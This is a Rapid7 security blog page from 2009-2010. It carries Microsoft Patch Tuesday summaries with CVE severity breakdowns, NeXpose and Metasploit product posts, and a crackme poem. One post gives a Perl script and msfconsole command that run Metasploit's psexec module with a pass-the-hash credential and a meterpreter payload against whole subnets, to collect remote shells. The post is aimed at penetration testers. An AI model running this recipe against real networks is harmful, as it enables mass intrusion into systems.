Rapid7 Network Security Blog

February 04th, 2010
0

February Microsoft Patch Tuesday Preview

Sheldon here with a quick preview of next week’s Microsoft Patch Tuesday updates …

If you’re on the customer side, you have a lot of patching to do starting next week. If you’re on the Security Research side, order some extra pizza and chill an extra case of Red Bull … this is going to be a busy one.

13 bulletins coming out on Tuesday – the most ever in February by my count. Last year was lighter than usual … we usually see 11 or 12 in February. December and January is usually light, so February is a busy clean-up month for Microsoft Security Updates. Last month’s out-of-band IE update put February under 14 updates, but it’s a February bulletin record and ties last October for the most Patch Tuesday updates.

2 Denial of Service; 2 Elevation of Privilege; and 9 Remote Code Execution.

2 updates for Office; 11 for Windows, with 26 (yes, 26) total vulnerabilities addressed.

Here’s a breakdown by affected software:

WINDOWS:

- Windows 2000: 9 updates … 5 Critical; 3 Important; and 1 Moderate

- Windows XP: 8 updates … 5 Critical; 2 Important; and 1 Moderate

- Server 2003: 9 updates … 4 Critical; 3 Important; 2 Moderate

- Vista: 6 updates … 3 Critical; and 3 Important

- Server 2008: 8 updates … 3 Critical; 4 Important; and 1 Low

- Windows 7: 5 updates … 3 Critical; and 2 Important

- Server 2008 R2: 5 updates … 3 Critical; 1 Important; and 1 Low

OFFICE:

- Office XP: 2 updates … 2 Important

- Office 2003: 1 update … 1 Important

- Office 2004 for Mac: 2 updates … 2 Important

Interesting to note, there are 2 known issues that will not be addressed on Tuesday.

The first one is the IE “Information Disclosure” vulnerability that some have described as “turning your PC into an Internet File Server”. Catchy … wish I’d thought of that description. No word yet if this will result in an out-of-band update or if it will wait until March or later. (Metasploit might have more influence on that decision than internal Microsoft processes — too early to say at this point). That’s advisory 980088.

The second one is the SMB DoS vulnerability that Microsoft discussed in advisory 977544 back in November. They are still working through that update, and as we’ve noted several times in the past, Microsoft is not known for rushing DoS fixes.

Microsoft *is* patching an issue that is 17 years in the making, however. This one only affects 32 bit Windows versions and the exposure lies in the NT Virtual DOS Machine (NTVDM) subsystem that’s been around since the early Windows NT days. For those who aren’t aware, VDM allows 32 bit Windows versions to run 16 bit applications and MS-DOS. If you’re not running 16 bit apps, this should have no impact on you. If you are still running 16 bit apps, I hope they’re not mission critical.

We’ll have more information for you when the advisories come out on Tuesday. Until then, get some rest … if you’re reading this, you’ll likely need it.

Post Your Comment

January 22nd, 2010
0

The True Value of “Free” in Vulnerability Management

Posted by Bernd Leger in Community, Patch Tuesday, Security Best Practices

Yesterday proved to be another busy day for the security community with Microsoft’s out of band security update for Internet Explorer. We’ve already blogged about the positive impact that Metasploit and the broader security community are having on increasing the awareness for major security issues.

Within 24 hours of the security update, we’ve included coverage for these vulnerabilities across all of our product lines, including NeXpose Community Edition. What’s interesting here is with the Community Edition, Rapid7 is the only vendor that provides a free solution for commercial use that has up-to-date vulnerability coverage within 24 hours. Something to think about for all those organizations that use commercial and open source offerings that have delayed vulnerability updates…

Post Your Comment

January 21st, 2010
0

January Out of Band Microsoft Patch Tuesday Roundup

Posted by Sheldon Malm in General

After a quiet Patch Tuesday last week with only one vulnerability announced, that calm has been followed by a bit of a storm. Here is a quick summary of this month’s summary of Microsoft’s Out of Band Security update …

1 updates, with 8 vulnerabilities covered. Here’s the breakdown:

MS10-002: Rated Critical. Potential Remote Code Execution, covering 8 vulnerabilities: CVE-2009-4074 (XSS Filter Script Handling), CVE-2010-0027 (URL Validation), CVE-2010-0244 (Uninitialized Memory Corruption), CVE-2010-0245 (Uninitialized Memory Corruption), CVE-2010-0246 (Uninitialized Memory Corruption), CVE-2010-0247 (Uninitialized Memory Corruption), CVE-2010-0248 (HTML Object Memory Corruption), and CVE-2010-0249 (HTML Object Memory Corruption). This update replaces MS09-072 from December of last year, which was critical for all platforms except Server 2003 and Server 2008.

As with MS09-072, this one needs a little more explanation to lay out what severity ratings map to what:

BY IE VERSION
- IE 5.01 & 6 are rated Critical on Windows 2000
- IE 6, 7, & 8 are rated Critical on XP
- IE 6 is rated *MODERATE*, IE 7 & 8 are rated *CRITICAL* on Server 2003
- MS09-072 was reversed: Critical on IE 6; Moderate on IE 7 & 8 for Server 2003
- IE 7 & 8 are rated Critical on Vista
- IE 7 & 8 are rated *CRITICAL* on Server 2008
- MS09-072 was rated Moderate for Server 2008
- IE 8 is rated *CRITICAL* on Server 2008 R2
- MS09-072 was rated Moderate for Server 2008 R2
- IE 8 is rated Critical on Windows 7

BY VULNERABILITY
- CVE-2009-4074:
- Moderate (Information Disclosure) for IE 8 on XP, Vista, and Windows 7
- Low (Information Disclosure) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0027:
- Critical (Remote Code Execution) for IE 7 on XP, Server 2003, Vista, Server 2008, and Windows 7
- Critical (Remote Code Execution) for IE 8 on XP, Server 2003, Vista, Server 2008, Windows 7, and Server 2008 R2

- CVE-2010-0244:
- Critical (Remote Code Execution) for IE 6 on Windows 2000 and XP
- Moderate (Remote Code Execution) for IE 6 on Server 2003
- Critical (Remote Code Execution) for IE 7 on XP and Vista
- Moderate (Remote Code Execution) for IE 7 on Server 2003, Server 2008
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0245:
- Critical (Remote Code Execution) for IE 8 on XP and Vista
- Moderate (Remote Code Execution) for IE 8 on Server 2003 and Server 2008
- Low (Denial of Service) for IE 8 on Windows 7 and Server 2008 R2

- CVE-2010-0246:
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0247:
- Critical (Remote Code Execution) for IE 5.01 on Windows 2000
- Critical (Remote Code Execution) for IE 6 on Windows 2000 and XP
- Moderate for IE 6 on Server 2003

- CVE-2010-0248:
- Critical (Remote Code Execution) for IE 6 on Windows 2000, XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 6 on Server 2003
- Critical (Remote Code Execution) for IE 7 on XP and Vista
- Moderate (Remote Code Execution) for IE 7 on Server 2003 and Server 2008
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0249:
- Critical (Remote Code Execution) for IE 6 on Windows 2000 and XP
- Moderate (Remote Code Execution) for IE 6 on Server 2003
- Critical (Remote Code Execution) for IE 7 on XP and Vista
- Moderate (Remote Code Execution) for IE 7 on Server 2003 and Server 2008
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

Hopefully this makes things a little clearer.

There has been a lot of buzz about this one, and we’d like to take a moment to thank the research community (and our own Metasploit team) for raising the profile of this issue and helping to raise the priority for Microsoft’s update(s). As expected, there are some who would paint the efforts of community researchers and the Metasploit project as “enabling the bad guys”. This could not be further from the truth … underestimating the severity of an existing risk does nothing to protect systems from compromise. Customers are getting the IE fix nearly 3 weeks earlier due in part to the availability of public exploit code and supporting research. Despite the fact that Microsoft has known about the issue since August, we believe they should be applauded for their responsiveness following the release of public exploit code. We feel very strongly that this is an example of community research prompting vendor actions that are ultimately in the best interest of customers.

NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect these vulnerabilities and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

For larger environments, even if NeXpose is not your current Enterprise Vulnerability Management solution, we invite you to download Community Edition and run it alongside your tool on Wednesday to audit the effectiveness of your solution on up to 32 hosts.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

As always, Happy patching!!

Post Your Comment

January 19th, 2010
0

The Story Behind NeXpose Community Edition

Posted by Richard Li in Community, Security Best Practices

Hi, I’m the product manager here at Rapid7 and one of the many people behind the Community Edition. I joined Rapid7 in July after spending my last eight years with Red Hat. Before that, I worked at another open source software company. Naturally, I have strong opinions on why open source and community-driven software is a fundamentally better way to build and release software.

With that as a background, I thought I’d take some time and explain the motivation and philosophy behind NeXpose community Edition and why we decided to do it. At Rapid7, we’ve always been big believers in open disclosure as the best way to improve security. The community-driven security process works. In the software industry, the momentum is clearly a trend towards openness and community. Some software companies are doing it just for the marketing (and it shows), but many others are actively embracing community and openness as part of their DNA. It’s not necessarily an easy or free process, but at the end of it, there are incredible benefits – starting with better software and happier customers.

As a group, we looked at the security market and at vulnerability management in particular, and we didn’t see a transition from closed to open. Surprisingly, we saw the opposite – a trend from open to closed. We think that this is bad for security, bad for customers, and bad for the community. And so it became apparent that releasing a free, unrestricted version of NeXpose would be a good thing.

But before we did that, I wanted to have a conversation internally about why we were doing it. I wanted to make sure that Rapid7 as a company was committed to investing in the community, instead of just releasing a free version of NeXpose and then hoping a community would materialize, because communities don’t just appear for free. So we had some active, spirited conversations about this and we decided, as a company, that we are committed to building a community.

We then had the debate about what features to include in Community Edition. After all, we are a for-profit company and we do have a duty to our shareholders to make money. Simultaneously, we wanted something that would be generically useful for everyone, and not just for a few. So we decided that, while we would impose some limitations (mostly around the number of IPs and some enterprise features), we would actually release with a license that does not restrict use as well as real-time vulnerability updates (including our 24 hour Microsoft patch Tuesday updates).

So, after that decision, in the last quarter of 2009, Rapid7 dramatically expanded the number of full-time engineers working on the free, open source version of Metasploit. We launched NeXpose Community Edition with flexible license terms and real-time vulnerability updates. We released Metasploit + NeXpose integration. We launched community.rapid7.com . We’ve responded to some of the initial feedback from the community, with more reporting functionality and improved usability. We’ve just barely started and we won’t stop.
Stay tuned for more.

Post Your Comment

January 12th, 2010
Comments Off

January Microsoft Patch Tuesday Roundup

Posted by Sheldon Malm in General

A new year, a new decade, and time once again for this month’s summary of the latest Microsoft Security updates … actually, that’s *update*.

1 update, with 1 vulnerability covered. Here’s the breakdown:

MS10-001: Rated Critical. Potential Remote Code Execution via integer overflow in LZCOMP Decompressor of the Embedded OpenType (EOT) Font Engine, covering 1 vulnerability: CVE-2010-0018. Important to note that Windows 2000 is rated critical; all others are rated low. This update replaces MS09-029 from July of last year, which was critical across the board.

Also interesting to note: Microsoft has specifically called out that the SMB DoS exposure is not being addressed today as they are still conducting research. No indication if this will be released as a subsequent out-of-band issue or whether we’ll see it in a future Patch Tuesday, although Microsoft does not have a history of addressing DoS exposures out of band.

NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect this vulnerability and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

As always, Happy patching!!

Post Your Comment

December 18th, 2009
Comments Off

Metasploit PSEXEC scanner (via Perl)

Posted by Jabra in General

Metasploit’s pexec module is one of my favorite modules. It does exactly what I need and it does it really well. One thing I wish that Metasploit had, is a scanner version of the psexec exploit module. So I decided to build my own with Perl.

Okay, assume we have the following networks: 192.168.1.0/24, 192.168.2.0/24 etc etc… We know the local admin account is Administrator and the hash for the account is ADMINISTRATOR:HASH.

First, we build a small Perl script to generate a configuration file:

#!/usr/bin/perl -w use strict; print "use windows/smb/psexec\n"; print "set SMBUser Administrator\n"; print "set SMBPass ADMINISTRATOR:HASH\n"; print "set PAYLOAD windows/meterpreter/bind_tcp\n"; # first range foreach(1.. 254) { print "set RHOST 192.168.1.$_\n"; print "exploit\n"; print "sleep 2\n"; } # second range foreach(1.. 254) { print "set RHOST 192.168.2.$_\n"; print "exploit\n"; print "sleep 2\n"; }

Once we have this script built, we simply execute it and save the result to a file named psexec.rc.

perl psexec-192-168.pl > psexec.rc

Lastly, we leverage Metasploit’s ability to execute commands passed into meterpreter via an resource file. Once Metasploit loads psexc.rc, it will execute all of the commands we generated using the Perl script. This basically gives us a nice way to create an exploit scanner.

msfconsole -r psexec.rc
Loading psexec.rc will exploit all of the systems within the networks specified and the result will be tons and tons of shells.

Regards,
Jabra

Post Your Comment

December 08th, 2009
Comments Off

December Microsoft Patch Tuesday Roundup

Posted by Sheldon Malm in General

Time once again for this month’s summary of the latest Microsoft Security updates. NeXpose (including the free NeXpose Community Edition) users will have coverage within 24 hours or less. Metasploit already had a module for the IE exposure. Here’s the breakdown …

6 updates, with 12 vulnerabilities covered. Here’s the breakdown:

MS09-069: Rated Critical. Potential Denial of Service via ISAKMP through IPsec affecting LSASS, covering 1 vulnerability: CVE-2009-3675. Important to note that Windows 2000, XP, and 2003 are affected; newer versions of Windows are not affected.

MS09-070: Rated Important. Potential Remote Code Execution and Elevation of Privilege in Active Directory Federation Services, covering 2 vulnerabilities: CVE-2009-2508 (Moderate; Spoofing) and CVE-2009-2509 (Important; Remote Code Execution). Important to note that the Spoofing exposure requires the attacker to obtain a valid authentication token. While this is a practical exposure on Internet kiosks, etc., most enterprises should have this covered under common best practices. The Remote Code Execution exposure has a significant impact to ADFS enabled Web servers, however the attacker must have valid credentials to exploit this vulnerability.

MS09-071: Rated Critical. Potential Remote Code Execution and Elevation of Privilege in Internet Authentication Service, covering 2 vulnerabilities: CVE-2009-2505 (Protected Extensible Authentication Protocol) and CVE-2009-3677 (Challenge Handshake Authentication Protocol version 2). The CHAP-2 vulnerability allows Elevation of Privilege across all supported Window versions except Windows 7 and Server 2008 R2. The PEAP exposure only affects Vista and Server 2008 when configured to use PEAP with CHAP-2 authentication. Important to note that IAS is Microsoft’s version of a RADIUS proxy and server, and PEAP provides authentication for 802.1x wireless clients, so this exposure presents a real risk for client-side wireless attacks.

MS09-072: Rated Critical. Potential Remote Code Execution in Internet Explorer 5.01, 6, 7, and 8, covering 5 vulnerabilities: CVE-2009-2493 (ATL COM Initialization), CVE-2009-3671 (Uninitialized Memory Corruption), CVE-2009-3672 (HTML Object Memory Corruption), CVE-2009-3673 (Uninitialized Memory Corruption), and CVE-2009-3674 (Uninitialized Memory Corruption). This one needs a little more explanation to lay out what severity ratings map to what:

BY IE VERSION
- IE 5.01 & 6 are rated Critical on Windows 2000
- IE 6, 7, & 8 are rated Critical on XP
- IE 6 is rated Critical, IE 7 & 8 are rated Moderate on Server 2003
- IE 7 & 8 are rated Critical on Vista
- IE 7 & 8 are rated Moderate on Server 2008
- IE 8 is rated Moderate on Server 2008 R2
- IE 8 is rated Critical on Windows 7

BY VULNERABILITY
- CVE-2009-2493:
- Critical for IE 5.01 on Windows 2000
- Critical for IE 6 on Windows 2000, XP, and 2003

- CVE-2009-3671:
- Critical for IE 8 on XP, Vista, and Windows 7
- Moderate for IE 8 on 2003 and 2008

- CVE-2009-3672:
- Critical for IE 6 on Windows 2000 and XP
- Critical for IE 7 on XP and Vista
- Moderate for IE 6 on 2003
- Moderate for IE 7 on 2003 and 2008

- CVE-2009-3673:
- Critical for IE 7 on XP and Vista
- Critical for IE 8 on XP, Vista, and Windows 7
- Moderate for IE 7 on 2003 and 2008
- Moderate for IE 8 on 2003, 2008, and 2008 R2

- CVE-2009-3674:
- Critical for IE 8 on XP, Vista, and Windows 7
- Moderate for IE 8 on 2003, 2008, and 2008 R2

MS09-073: Rated Important. Potential Remote Code Execution via Word 97 file conversion, affecting Windows 2000, XP, and 2003, Works 8.5/WordPad, Word 2002, Word 2003, and Office Converter Pack, covering 1 vulnerability: CVE-2009-2506. It’s fun to see WordPad implicated in a vulnerability, but this one is not at the top of the priority list for this month.

MS09-074: Rated Important. Potential Remote Code Execution via XXXX affecting MS Project, covering 1 vulnerability: CVE-2009-0102. Important to note that this one is only Critical for Project 2000; rated Important for Project 2002 and 2003. While the Impact of this vulnerability is real, the likelihood of successful, widespread attacks against Project is pretty slim (let alone successful attacks against Project 2000). These are not typically externally facing systems and are not as widely deployed as Operating Systems, Standard Office components, etc.

So … patch IE, patch Internet Authentication Server, and prioritize the rest based on your environment and testing/deployment schedule.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

As always, Happy patching!!

Post Your Comment

December 03rd, 2009
Comments Off

December Microsoft Patch Tuesday Preview

Posted by Sheldon Malm in Community, Patch Tuesday

Sheldon here with a preview of what’s coming out in next week’s Microsoft Patch Tuesday …

6 updates in total, covering 12 vulnerabilities. Windows, IE, and Office are affected.

Bulletin 1: Remote Code Execution affects all supported Windows versions, rated Important on most, Moderate on XP, and Critical on Server 2008. This will be the second highest priority out of the Critical updates – particularly if you have deployed Windows Server 2008.

Bulletin 2: Remote Code Execution doesn’t affect newer versions of Windows, rated Important on Windows 2000, XP, and Server 2003. It is also rated Important on Word for Office XP and Office 2003 along with Works and the Office Converter Pack.

Bulletin 3: Remote Code Execution is the least severe of the Critical updates, rated Important on Project 2003 and Critical on Project 2000. If you have deployed Project widely, this is worth planning your testing and rollout in the short term.

Bulletin 4: Remote Code Execution is this month’s monster, addressing the IE 6, 7 and 8 invalid pointer reference zero day that has been highlighted in the press. There is already a Metasploit module for this one, so it’s exploitability is without question. It is rated Critical across all Windows platforms except Server 2008 (Moderate), and is the only update affecting Windows 7 this month.

Bulletin 5: Denial of Service doesn’t affect newer versions of Windows. Like Bulletin 2, it is rated Important on Windows 2000, XP, and Server 2003.

Bulletin 6: Remote Code Execution is the last one, only affecting Windows Server Operating Systems. It is rated Important on Server 2003 and Server 2008.

All in all, this is a pretty manageable month from a prioritization, testing, and deployment perspective. Our recommendation is to patch IE first and prioritize the rest as appropriate. As more information is available on Tuesday, we’ll provide more detailed recommendations.

NeXpose Community Edition, the free version of NeXpose, will have coverage for all of these vulnerabilities within 24 hours of the Patch releases. Particularly for Bulletin 4 – this month’s big one – NeXpose Community Edition will allow you to detect this vulnerability and, if you wish, automatically launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can now use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at: http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

More to follow on Tuesday.

Post Your Comment

December 03rd, 2009
Comments Off

NeXpose Community Edition/Metasploit Integration: Responding to the Needs of Users

Posted by Sheldon Malm in Community, General

When we released NeXpose Community Edition and Metasploit 3.3.1 two days ago, we received a lot of interest from members of the community. As people have downloaded the new releases and started using them, we’ve had a lot of great feedback. Your response has been exceptionally positive and people are finding a lot of value in the NeXpose/Metasploit integration. Sincere thanks to everyone who has provided feedback so far.

As with any free product version, there are some enterprise features that are not bundled with the NeXpose Community Edition. The NeXpose Community Edition allows a maximum of 32 IP’s, does not ship with dynamic Web application scanning, and ships without configurable scan templates or discovery mode. While enterprise support is available for commercial product versions, answers to common questions and a forum for discussion have been set up on the Community Portal at http://community.rapid7.com

The rest of the enterprise features from NeXpose are available in Community edition at no cost, and you will have access to new vulnerability coverage within 24 hours of next week’s MS Patch Tuesday updates. Metasploit integration in the NeXpose Community Edition goes beyond the manual import capabilities offered by commercial vendors up to this point, with support for launching NeXpose scans from the Metasploit console and the ability to import scan results automatically, and the ability to automatically launch exploit modules following scan completion.

Based on early feedback from some of you, the most requested feature was the addition of Discovery capabilities to this version. In response to your requests, we have released a metasploit update that allows NeXpose scans to be launched using a Metasploit database of discovery results, imported from tools such as nmap, etc. Details of the update can be found on the Metasploit site at http://www.metasploit.com/redmine/projects/framework/wiki/NeXpose_Plugin#Discovery

We will continue to listen to your feedback and provide updates as responsively as possible. We hope that you enjoy using the NeXpose Community Edition with Metasploit and look forward to hearing your stories and experiences.

For those who have not yet had an opportunity to check it out, the NeXpose Community Edition is available at http://www.rapid7.com/nexposecommunitydownload.jsp

For those who are using the NeXpose Community Edition and would like to interact with other Security Professionals, we invite you to join the discussion at http://community.rapid7.com

Post Your Comment

December 02nd, 2009
Comments Off

The Noisy Assembly

Posted by Sean Taylor in General

Not like the exploits out on STS With straight-forward hints and straight-forward flow; Here is a program, which IDA shall show The feat I’ve taken to find and assess. Contained is a message to unsuppress Discovered by breaking the code– although I confess that is not all you must know, For you must have talent– you cannot guess. Take your debugger and apply your guile. Remember this: “Give me your tired, your bored, Your jaded brilliants yearning revival, The punished refuse who simply explored. This file, you hackers, contains my trial, Take it and break it and reap your reward.”

[7abca22678a148c8f891b4b6adfd79bd11408470 rot13.exe]

Post Your Comment

Older Posts »

February Microsoft Patch Tuesday Preview

The True Value of “Free” in Vulnerability Management

January Out of Band Microsoft Patch Tuesday Roundup

The Story Behind NeXpose Community Edition

January Microsoft Patch Tuesday Roundup

Metasploit PSEXEC scanner (via Perl)

December Microsoft Patch Tuesday Roundup

December Microsoft Patch Tuesday Preview

NeXpose Community Edition/Metasploit Integration: Responding to the Needs of Users

The Noisy Assembly

Categories

Our Featured Bloggers

Recent Posts

Archives

Tags